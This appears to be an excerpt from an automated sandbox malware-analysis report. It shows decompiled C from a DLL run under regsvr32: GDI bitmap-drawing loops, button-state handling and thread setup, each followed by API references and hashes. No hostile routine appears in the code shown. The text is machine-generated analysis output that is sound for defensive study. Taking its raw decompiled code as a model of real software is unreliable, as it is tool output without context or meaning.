                                                                                                                • Opcode ID: 50f5ff4215dff875a8325bf096b0006136332da0b19e06f77ad7a191bff5b875
                                                                                                                • Instruction ID: 2116953bbfb5f2c777d961c5881e73fe07f5ab918cdb7214135486e8651d46b7
                                                                                                                • Opcode Fuzzy Hash: 50f5ff4215dff875a8325bf096b0006136332da0b19e06f77ad7a191bff5b875
                                                                                                                • Instruction Fuzzy Hash: D561BD752047029FD704DB64CC95E6BB3E5EF883A0F004A1DF66A8B295DF30E94ACB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10014EF7() {
                                                                                                                				intOrPtr _t91;
                                                                                                                				struct HDC__* _t92;
                                                                                                                				void* _t99;
                                                                                                                				void* _t111;
                                                                                                                				int _t117;
                                                                                                                				signed int _t130;
                                                                                                                				signed short _t150;
                                                                                                                				void* _t153;
                                                                                                                				int _t155;
                                                                                                                				void* _t157;
                                                                                                                
                                                                                                                				while(1) {
                                                                                                                					L18:
                                                                                                                					_t117 =  *(_t157 + 0x38);
                                                                                                                					while(1) {
                                                                                                                						L19:
                                                                                                                						BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4),  *(_t153 + 0x14),  *(_t153 + 0x18),  *(_t157 + 0x40), _t117,  *(_t157 + 0x2c),  *(_t153 + 8),  *(_t153 + 0xc), 0xcc0020);
                                                                                                                						 *(_t153 + 0xc) =  *(_t153 + 0xc) + 0xffffffff;
                                                                                                                						if( *(_t153 + 0xc) > 0) {
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						while(1) {
                                                                                                                							_t155 = 0;
                                                                                                                							do {
                                                                                                                								do {
                                                                                                                									do {
                                                                                                                										L26:
                                                                                                                										 *(_t153 + 0x14) =  *(_t153 + 0x14) + 0x3c;
                                                                                                                										 *(_t153 + 0x18) =  *(_t153 + 0x18) + 0x14;
                                                                                                                										 *(_t153 + 0x10) =  *(_t153 + 0x10) + 1;
                                                                                                                										Sleep(0xbb8);
                                                                                                                										BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4), _t155, _t155,  *(_t157 + 0x24),  *(_t157 + 0x58),  *(_t157 + 0x24), _t155, _t155, 0x42);
                                                                                                                										E10024592(_t157 + 0x20);
                                                                                                                										 *((intOrPtr*)(_t153 + 0x1c)) =  *((intOrPtr*)(_t153 + 0x1c)) + 1;
                                                                                                                										 *(_t157 + 0x50) = 0;
                                                                                                                										 *(_t157 + 0x18) = 0x100572c4;
                                                                                                                										E10024848(_t157 + 0x18);
                                                                                                                										 *(_t157 + 0x50) = 0xffffffff;
                                                                                                                										E100245A8(_t157 + 0x20);
                                                                                                                										_t155 = 0;
                                                                                                                										if( *((intOrPtr*)(_t153 + 0x1c)) >= 5) {
                                                                                                                											 *((intOrPtr*)(_t153 + 0x1c)) = 0;
                                                                                                                										}
                                                                                                                										E10023F76(_t157 + 0x20);
                                                                                                                										_t91 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                                                										_t161 = _t91 - _t155;
                                                                                                                										 *(_t157 + 0x50) = _t155;
                                                                                                                										if(_t91 != _t155) {
                                                                                                                											_t92 =  *(_t91 + 4);
                                                                                                                										} else {
                                                                                                                											_t92 = 0;
                                                                                                                										}
                                                                                                                										E1002452E(_t157 + 0x24, 1, _t155, CreateCompatibleDC(_t92));
                                                                                                                										 *(_t157 + 0x1c) = _t155;
                                                                                                                										 *(_t157 + 0x18) = 0x100572e4;
                                                                                                                										 *(_t157 + 0x50) = 1;
                                                                                                                										_t150 =  *((intOrPtr*)(_t153 + 0x1c)) + 0xaf;
                                                                                                                										E100247F5(_t157 + 0x1c, _t150, _t155, LoadBitmapA( *(E10023187(_t117, _t150, _t153, _t161) + 0xc), _t150 & 0x0000ffff));
                                                                                                                										_t99 =  *(_t157 + 0x1c);
                                                                                                                										if(_t99 != _t155) {
                                                                                                                											SelectObject( *(_t157 + 0x24), _t99);
                                                                                                                											_t99 =  *(_t157 + 0x1c);
                                                                                                                										}
                                                                                                                										GetObjectA(_t99, 0x18, _t157 + 0x30);
                                                                                                                										_t117 = GetSystemMetrics(_t155);
                                                                                                                										 *(_t157 + 0x18) = _t117;
                                                                                                                										_t130 = GetSystemMetrics(1);
                                                                                                                										 *(_t157 + 0x58) = _t130;
                                                                                                                										if( *(_t153 + 0x14) > (0x66666667 * _t117 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t117 >> 0x20 >> 1)) {
                                                                                                                											 *(_t153 + 0x14) = _t155;
                                                                                                                										}
                                                                                                                										if( *(_t153 + 0x18) > (0x66666667 * _t130 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t130 >> 0x20 >> 1)) {
                                                                                                                											 *(_t153 + 0x18) = _t155;
                                                                                                                										}
                                                                                                                										if( *(_t153 + 0x10) > 1) {
                                                                                                                											 *(_t153 + 0x10) = _t155;
                                                                                                                										}
                                                                                                                										_t111 =  *(_t153 + 0x10) - _t155;
                                                                                                                										if(_t111 != 0) {
                                                                                                                											goto L15;
                                                                                                                										}
                                                                                                                										_t117 =  *(_t157 + 0x34);
                                                                                                                										__eflags = _t117 - _t155;
                                                                                                                										 *(_t153 + 8) = _t117;
                                                                                                                									} while (_t117 <= _t155);
                                                                                                                									while(1) {
                                                                                                                										BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4),  *(_t153 + 0x14),  *(_t153 + 0x18), _t117,  *(_t157 + 0x44),  *(_t157 + 0x2c),  *(_t153 + 8),  *(_t153 + 0xc), 0xcc0020);
                                                                                                                										 *(_t153 + 8) =  *(_t153 + 8) + 0xffffffff;
                                                                                                                										__eflags =  *(_t153 + 8);
                                                                                                                										if( *(_t153 + 8) <= 0) {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										_t117 =  *(_t157 + 0x34);
                                                                                                                									}
                                                                                                                									_t155 = 0;
                                                                                                                									goto L26;
                                                                                                                									L15:
                                                                                                                								} while (_t111 != 1);
                                                                                                                								_t117 =  *(_t157 + 0x38);
                                                                                                                								 *(_t153 + 0xc) = _t117;
                                                                                                                							} while (_t117 <= _t155);
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10014E17
                                                                                                                • LoadBitmapA.USER32 ref: 10014E4E
                                                                                                                • SelectObject.GDI32(?,?), ref: 10014E6C
                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 10014E7E
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E8B
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E95
                                                                                                                • BitBlt.GDI32(?,0000003C,00000014,?,?,?,?,?,00CC0020), ref: 10014F2B
                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 10014FA2
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00000042), ref: 10014FC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsObjectSystem$BitmapCompatibleCreateLoadSelectSleep
                                                                                                                • String ID: gfff$gfff
                                                                                                                • API String ID: 1121727421-3084402119
                                                                                                                • Opcode ID: d3cfe3c45f35c1032e74498a24e822426951bd9ca6eb631fe77debd20703ad92
                                                                                                                • Instruction ID: d6159a051e035c351a0165b5dde6699716bc4dbbbf81474a2c8df47965471cf1
                                                                                                                • Opcode Fuzzy Hash: d3cfe3c45f35c1032e74498a24e822426951bd9ca6eb631fe77debd20703ad92
                                                                                                                • Instruction Fuzzy Hash: DF5189B51047459FC364CF65D88492BB7F8FB98310F018A1CF5868B2A1DB70F949CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10014EF9() {
                                                                                                                				intOrPtr _t83;
                                                                                                                				struct HDC__* _t84;
                                                                                                                				void* _t91;
                                                                                                                				void* _t103;
                                                                                                                				int _t117;
                                                                                                                				signed int _t123;
                                                                                                                				signed short _t149;
                                                                                                                				void* _t153;
                                                                                                                				int _t154;
                                                                                                                				void* _t157;
                                                                                                                
                                                                                                                				while(1) {
                                                                                                                					L18:
                                                                                                                					_t117 =  *(_t157 + 0x38);
                                                                                                                					while(1) {
                                                                                                                						L19:
                                                                                                                						BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4),  *(_t153 + 0x14),  *(_t153 + 0x18),  *(_t157 + 0x40), _t117,  *(_t157 + 0x2c),  *(_t153 + 8),  *(_t153 + 0xc), 0xcc0020);
                                                                                                                						 *(_t153 + 0xc) =  *(_t153 + 0xc) + 0xffffffff;
                                                                                                                						if( *(_t153 + 0xc) > 0) {
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						while(1) {
                                                                                                                							_t154 = 0;
                                                                                                                							do {
                                                                                                                								do {
                                                                                                                									do {
                                                                                                                										L26:
                                                                                                                										 *(_t153 + 0x14) =  *(_t153 + 0x14) + 0x3c;
                                                                                                                										 *(_t153 + 0x18) =  *(_t153 + 0x18) + 0x14;
                                                                                                                										 *(_t153 + 0x10) =  *(_t153 + 0x10) + 1;
                                                                                                                										Sleep(0xbb8);
                                                                                                                										BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4), _t154, _t154,  *(_t157 + 0x24),  *(_t157 + 0x58),  *(_t157 + 0x24), _t154, _t154, 0x42);
                                                                                                                										E10024592(_t157 + 0x20);
                                                                                                                										 *((intOrPtr*)(_t153 + 0x1c)) =  *((intOrPtr*)(_t153 + 0x1c)) + 1;
                                                                                                                										 *(_t157 + 0x50) = 0;
                                                                                                                										 *(_t157 + 0x18) = 0x100572c4;
                                                                                                                										E10024848(_t157 + 0x18);
                                                                                                                										 *(_t157 + 0x50) = 0xffffffff;
                                                                                                                										E100245A8(_t157 + 0x20);
                                                                                                                										_t154 = 0;
                                                                                                                										if( *((intOrPtr*)(_t153 + 0x1c)) >= 5) {
                                                                                                                											 *((intOrPtr*)(_t153 + 0x1c)) = 0;
                                                                                                                										}
                                                                                                                										E10023F76(_t157 + 0x20);
                                                                                                                										_t83 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                                                										_t159 = _t83 - _t154;
                                                                                                                										 *(_t157 + 0x50) = _t154;
                                                                                                                										if(_t83 != _t154) {
                                                                                                                											_t84 =  *(_t83 + 4);
                                                                                                                										} else {
                                                                                                                											_t84 = 0;
                                                                                                                										}
                                                                                                                										E1002452E(_t157 + 0x24, 1, _t154, CreateCompatibleDC(_t84));
                                                                                                                										 *(_t157 + 0x1c) = _t154;
                                                                                                                										 *(_t157 + 0x18) = 0x100572e4;
                                                                                                                										 *(_t157 + 0x50) = 1;
                                                                                                                										_t149 =  *((intOrPtr*)(_t153 + 0x1c)) + 0xaf;
                                                                                                                										E100247F5(_t157 + 0x1c, _t149, _t154, LoadBitmapA( *(E10023187(_t117, _t149, _t153, _t159) + 0xc), _t149 & 0x0000ffff));
                                                                                                                										_t91 =  *(_t157 + 0x1c);
                                                                                                                										if(_t91 != _t154) {
                                                                                                                											SelectObject( *(_t157 + 0x24), _t91);
                                                                                                                											_t91 =  *(_t157 + 0x1c);
                                                                                                                										}
                                                                                                                										GetObjectA(_t91, 0x18, _t157 + 0x30);
                                                                                                                										_t117 = GetSystemMetrics(_t154);
                                                                                                                										 *(_t157 + 0x18) = _t117;
                                                                                                                										_t123 = GetSystemMetrics(1);
                                                                                                                										 *(_t157 + 0x58) = _t123;
                                                                                                                										if( *(_t153 + 0x14) > (0x66666667 * _t117 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t117 >> 0x20 >> 1)) {
                                                                                                                											 *(_t153 + 0x14) = _t154;
                                                                                                                										}
                                                                                                                										if( *(_t153 + 0x18) > (0x66666667 * _t123 >> 0x20 >> 1 >> 0x1f) + (0x66666667 * _t123 >> 0x20 >> 1)) {
                                                                                                                											 *(_t153 + 0x18) = _t154;
                                                                                                                										}
                                                                                                                										if( *(_t153 + 0x10) > 1) {
                                                                                                                											 *(_t153 + 0x10) = _t154;
                                                                                                                										}
                                                                                                                										_t103 =  *(_t153 + 0x10) - _t154;
                                                                                                                										if(_t103 != 0) {
                                                                                                                											goto L15;
                                                                                                                										}
                                                                                                                										_t117 =  *(_t157 + 0x34);
                                                                                                                										__eflags = _t117 - _t154;
                                                                                                                										 *(_t153 + 8) = _t117;
                                                                                                                									} while (_t117 <= _t154);
                                                                                                                									while(1) {
                                                                                                                										BitBlt( *( *((intOrPtr*)(_t153 + 0x20)) + 4),  *(_t153 + 0x14),  *(_t153 + 0x18), _t117,  *(_t157 + 0x44),  *(_t157 + 0x2c),  *(_t153 + 8),  *(_t153 + 0xc), 0xcc0020);
                                                                                                                										 *(_t153 + 8) =  *(_t153 + 8) + 0xffffffff;
                                                                                                                										__eflags =  *(_t153 + 8);
                                                                                                                										if( *(_t153 + 8) <= 0) {
                                                                                                                											break;
                                                                                                                										}
                                                                                                                										_t117 =  *(_t157 + 0x34);
                                                                                                                									}
                                                                                                                									_t154 = 0;
                                                                                                                									goto L26;
                                                                                                                									L15:
                                                                                                                								} while (_t103 != 1);
                                                                                                                								_t117 =  *(_t157 + 0x38);
                                                                                                                								 *(_t153 + 0xc) = _t117;
                                                                                                                							} while (_t117 <= _t154);
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10014E17
                                                                                                                • LoadBitmapA.USER32 ref: 10014E4E
                                                                                                                • SelectObject.GDI32(?,?), ref: 10014E6C
                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 10014E7E
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E8B
                                                                                                                • GetSystemMetrics.USER32 ref: 10014E95
                                                                                                                • BitBlt.GDI32(?,0000003C,00000014,?,?,?,?,?,00CC0020), ref: 10014F2B
                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 10014FA2
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00000042), ref: 10014FC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsObjectSystem$BitmapCompatibleCreateLoadSelectSleep
                                                                                                                • String ID: gfff$gfff
                                                                                                                • API String ID: 1121727421-3084402119
                                                                                                                • Opcode ID: 38c02c7b247e89f22e7bf342b96bc1f65394471f5d19e3c025dc83780a737c20
                                                                                                                • Instruction ID: 8802ad821846f76bbbe8fb1b312adab2a2dfde2f0c1ac157e225ad3b35639ec6
                                                                                                                • Opcode Fuzzy Hash: 38c02c7b247e89f22e7bf342b96bc1f65394471f5d19e3c025dc83780a737c20
                                                                                                                • Instruction Fuzzy Hash: 7B5177B55047859FC364CF65D88492BB7F8FB98310F018A1CF5868B6A1DB70F949CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10014290(void* __ebx, long _a4) {
                                                                                                                				long _v4;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed char _t95;
                                                                                                                				int* _t96;
                                                                                                                				int* _t97;
                                                                                                                				int* _t101;
                                                                                                                				int* _t102;
                                                                                                                				int* _t106;
                                                                                                                				int* _t107;
                                                                                                                				int* _t111;
                                                                                                                				int* _t112;
                                                                                                                				long _t116;
                                                                                                                				long _t144;
                                                                                                                				signed char _t147;
                                                                                                                				int* _t153;
                                                                                                                				int _t163;
                                                                                                                				void* _t165;
                                                                                                                				intOrPtr _t168;
                                                                                                                				intOrPtr _t170;
                                                                                                                				intOrPtr _t172;
                                                                                                                				intOrPtr _t174;
                                                                                                                				signed char _t190;
                                                                                                                				signed char _t195;
                                                                                                                				void* _t202;
                                                                                                                				signed char _t213;
                                                                                                                				void* _t218;
                                                                                                                				int _t219;
                                                                                                                				long _t220;
                                                                                                                
                                                                                                                				_t162 = __ebx;
                                                                                                                				_t220 = _a4;
                                                                                                                				_t95 =  *(_t220 + 0x18);
                                                                                                                				_t218 = _t165;
                                                                                                                				if(( !_t95 & 0x00000001) == 0) {
                                                                                                                					__eflags = _t95 & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t220 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(__ebx, _t202, _t218, _t220, __eflags);
                                                                                                                					}
                                                                                                                					_t96 =  *(_t220 + 0x28);
                                                                                                                					_t168 =  *((intOrPtr*)(_t220 + 0x2c));
                                                                                                                					_t203 =  &(_t96[1]);
                                                                                                                					__eflags =  &(_t96[1]) - _t168;
                                                                                                                					if( &(_t96[1]) > _t168) {
                                                                                                                						__eflags = _t96 - _t168 + 4;
                                                                                                                						E1001FADC(_t220, _t203, _t96 - _t168 + 4);
                                                                                                                					}
                                                                                                                					_t97 =  *(_t220 + 0x28);
                                                                                                                					 *(_t220 + 0x28) =  &(_t97[1]);
                                                                                                                					SendMessageA( *(_t218 + 0x1a4), 0xf1,  *_t97, 0);
                                                                                                                					__eflags =  *(_t220 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t220 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t162, _t203, _t218, _t220, __eflags);
                                                                                                                					}
                                                                                                                					_t101 =  *(_t220 + 0x28);
                                                                                                                					_t170 =  *((intOrPtr*)(_t220 + 0x2c));
                                                                                                                					_t204 =  &(_t101[1]);
                                                                                                                					__eflags =  &(_t101[1]) - _t170;
                                                                                                                					if( &(_t101[1]) > _t170) {
                                                                                                                						__eflags = _t101 - _t170 + 4;
                                                                                                                						E1001FADC(_t220, _t204, _t101 - _t170 + 4);
                                                                                                                					}
                                                                                                                					_t102 =  *(_t220 + 0x28);
                                                                                                                					 *(_t220 + 0x28) =  &(_t102[1]);
                                                                                                                					SendMessageA( *(_t218 + 0x150), 0xf1,  *_t102, 0);
                                                                                                                					__eflags =  *(_t220 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t220 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t162, _t204, _t218, _t220, __eflags);
                                                                                                                					}
                                                                                                                					_t106 =  *(_t220 + 0x28);
                                                                                                                					_t172 =  *((intOrPtr*)(_t220 + 0x2c));
                                                                                                                					_t205 =  &(_t106[1]);
                                                                                                                					__eflags =  &(_t106[1]) - _t172;
                                                                                                                					if( &(_t106[1]) > _t172) {
                                                                                                                						__eflags = _t106 - _t172 + 4;
                                                                                                                						E1001FADC(_t220, _t205, _t106 - _t172 + 4);
                                                                                                                					}
                                                                                                                					_t107 =  *(_t220 + 0x28);
                                                                                                                					 *(_t220 + 0x28) =  &(_t107[1]);
                                                                                                                					SendMessageA( *(_t218 + 0xfc), 0xf1,  *_t107, 0);
                                                                                                                					__eflags =  *(_t220 + 0x18) & 0x00000001;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_push( *((intOrPtr*)(_t220 + 0x14)));
                                                                                                                						_push(4);
                                                                                                                						E10020287(_t162, _t205, _t218, _t220, __eflags);
                                                                                                                					}
                                                                                                                					_t111 =  *(_t220 + 0x28);
                                                                                                                					_t174 =  *((intOrPtr*)(_t220 + 0x2c));
                                                                                                                					_t206 =  &(_t111[1]);
                                                                                                                					__eflags =  &(_t111[1]) - _t174;
                                                                                                                					if( &(_t111[1]) > _t174) {
                                                                                                                						__eflags = _t111 - _t174 + 4;
                                                                                                                						E1001FADC(_t220, _t206, _t111 - _t174 + 4);
                                                                                                                					}
                                                                                                                					_t112 =  *(_t220 + 0x28);
                                                                                                                					 *(_t220 + 0x28) =  &(_t112[1]);
                                                                                                                					SendMessageA( *(_t218 + 0xa8), 0xf1,  *_t112, 0);
                                                                                                                					_t116 = SendMessageA( *(_t218 + 0x1a4), 0xf0, 0, 0);
                                                                                                                					__eflags = _t116;
                                                                                                                					if(_t116 == 0) {
                                                                                                                						return _t116;
                                                                                                                					} else {
                                                                                                                						E1001D39A(_t218 + 0x130, 0);
                                                                                                                						E1001D39A(_t218 + 0xdc, 0);
                                                                                                                						E1001D39A(_t218 + 0x88, 0);
                                                                                                                						SendMessageA( *(_t218 + 0x150), 0xf1, 0, 0);
                                                                                                                						SendMessageA( *(_t218 + 0xfc), 0xf1, 0, 0);
                                                                                                                						return SendMessageA( *(_t218 + 0xa8), 0xf1, 0, 0);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_push(__ebx);
                                                                                                                				_v4 = SendMessageA( *(_t218 + 0xa8), 0xf0, 0, 0);
                                                                                                                				_a4 = SendMessageA( *(_t218 + 0xfc), 0xf0, 0, 0);
                                                                                                                				_t144 = SendMessageA( *(_t218 + 0x150), 0xf0, 0, 0);
                                                                                                                				_t209 =  *(_t218 + 0x1a4);
                                                                                                                				_t163 = _t144;
                                                                                                                				_t219 = SendMessageA( *(_t218 + 0x1a4), 0xf0, 0, 0);
                                                                                                                				_t147 =  !( *(_t220 + 0x18));
                                                                                                                				_t225 = _t147 & 0x00000001;
                                                                                                                				if((_t147 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t220 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t163, _t209, _t219, _t220, _t225);
                                                                                                                				}
                                                                                                                				if( &(( *(_t220 + 0x28))[1]) >  *((intOrPtr*)(_t220 + 0x2c))) {
                                                                                                                					E1001FA65(_t220);
                                                                                                                				}
                                                                                                                				 *( *(_t220 + 0x28)) = _t219;
                                                                                                                				 *(_t220 + 0x28) =  &(( *(_t220 + 0x28))[1]);
                                                                                                                				_t190 =  !( *(_t220 + 0x18));
                                                                                                                				_t227 = _t190 & 0x00000001;
                                                                                                                				if((_t190 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t220 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t163,  *((intOrPtr*)(_t220 + 0x14)), _t219, _t220, _t227);
                                                                                                                				}
                                                                                                                				if( &(( *(_t220 + 0x28))[1]) >  *((intOrPtr*)(_t220 + 0x2c))) {
                                                                                                                					E1001FA65(_t220);
                                                                                                                				}
                                                                                                                				 *( *(_t220 + 0x28)) = _t163;
                                                                                                                				 *(_t220 + 0x28) =  &(( *(_t220 + 0x28))[1]);
                                                                                                                				_t213 =  !( *(_t220 + 0x18));
                                                                                                                				_t229 = _t213 & 0x00000001;
                                                                                                                				if((_t213 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t220 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t163, _t213, _t219, _t220, _t229);
                                                                                                                				}
                                                                                                                				if( &(( *(_t220 + 0x28))[1]) >  *((intOrPtr*)(_t220 + 0x2c))) {
                                                                                                                					E1001FA65(_t220);
                                                                                                                				}
                                                                                                                				 *( *(_t220 + 0x28)) = _a4;
                                                                                                                				 *(_t220 + 0x28) =  &(( *(_t220 + 0x28))[1]);
                                                                                                                				_t195 =  !( *(_t220 + 0x18));
                                                                                                                				_t231 = _t195 & 0x00000001;
                                                                                                                				if((_t195 & 0x00000001) == 0) {
                                                                                                                					_push( *((intOrPtr*)(_t220 + 0x14)));
                                                                                                                					_push(2);
                                                                                                                					E10020287(_t163,  *((intOrPtr*)(_t220 + 0x14)), _t219, _t220, _t231);
                                                                                                                				}
                                                                                                                				_t153 =  &(( *(_t220 + 0x28))[1]);
                                                                                                                				if(_t153 >  *((intOrPtr*)(_t220 + 0x2c))) {
                                                                                                                					_t153 = E1001FA65(_t220);
                                                                                                                				}
                                                                                                                				 *( *(_t220 + 0x28)) = _v4;
                                                                                                                				 *(_t220 + 0x28) =  &(( *(_t220 + 0x28))[1]);
                                                                                                                				return _t153;
                                                                                                                			}



































                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Exception@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952110909-0
                                                                                                                • Opcode ID: bf840e01c7514d2540411e702dc27d12f361d6ee476bee38d37ef4a0a16736af
                                                                                                                • Instruction ID: 799a79b79d5c8d11ebf5c911212c3c5f29a23d589c12ce2fa1e42d3b04ba1764
                                                                                                                • Opcode Fuzzy Hash: bf840e01c7514d2540411e702dc27d12f361d6ee476bee38d37ef4a0a16736af
                                                                                                                • Instruction Fuzzy Hash: 9D916175340B02AFE224DB65CC92F66B3E5EF48724F11461CF24A9BA91CF74F8818B54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10023B13(intOrPtr __ecx, void* __edx, signed char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				char _v32;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t41;
                                                                                                                				void* _t55;
                                                                                                                				void* _t56;
                                                                                                                				intOrPtr _t59;
                                                                                                                
                                                                                                                				_t55 = __edx;
                                                                                                                				_t59 = __ecx;
                                                                                                                				_t63 =  *((intOrPtr*)(__ecx + 0x2c));
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
                                                                                                                					E1001729E(0, __ecx, _t56, __ecx, _t63);
                                                                                                                				}
                                                                                                                				E1003BB70(_t56,  &_v32, 0, 0x1c);
                                                                                                                				_v32 = E10022C52(0, _t56, _t59, _t63);
                                                                                                                				_v28 = _t59;
                                                                                                                				_v16 = CreateEventA(0, 1, 0, 0);
                                                                                                                				_v12 = CreateEventA(0, 1, 0, 0);
                                                                                                                				_t35 = _a4;
                                                                                                                				_v24 = _a4;
                                                                                                                				if(_v16 == 0) {
                                                                                                                					L11:
                                                                                                                					__eflags = _v12;
                                                                                                                					if(_v12 == 0) {
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					if(_v12 == 0) {
                                                                                                                						CloseHandle(_v16);
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_t41 = E10040AD8(_t55, _a12, _a8, E100239FB,  &_v32, _t35 | 0x00000004, _t59 + 0x30);
                                                                                                                					 *(_t59 + 0x2c) = _t41;
                                                                                                                					if(_t41 == 0) {
                                                                                                                						L13:
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                					ResumeThread(_t41);
                                                                                                                					WaitForSingleObject(_v16, 0xffffffff);
                                                                                                                					CloseHandle(_v16);
                                                                                                                					if((_a4 & 0x00000004) != 0) {
                                                                                                                						SuspendThread( *(_t59 + 0x2c));
                                                                                                                					}
                                                                                                                					if(_v8 == 0) {
                                                                                                                						SetEvent(_v12);
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						WaitForSingleObject( *(_t59 + 0x2c), 0xffffffff);
                                                                                                                						CloseHandle( *(_t59 + 0x2c));
                                                                                                                						 *(_t59 + 0x2c) = 0;
                                                                                                                						L12:
                                                                                                                						CloseHandle(_v12);
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 10023B31
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10023B4F
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10023B59
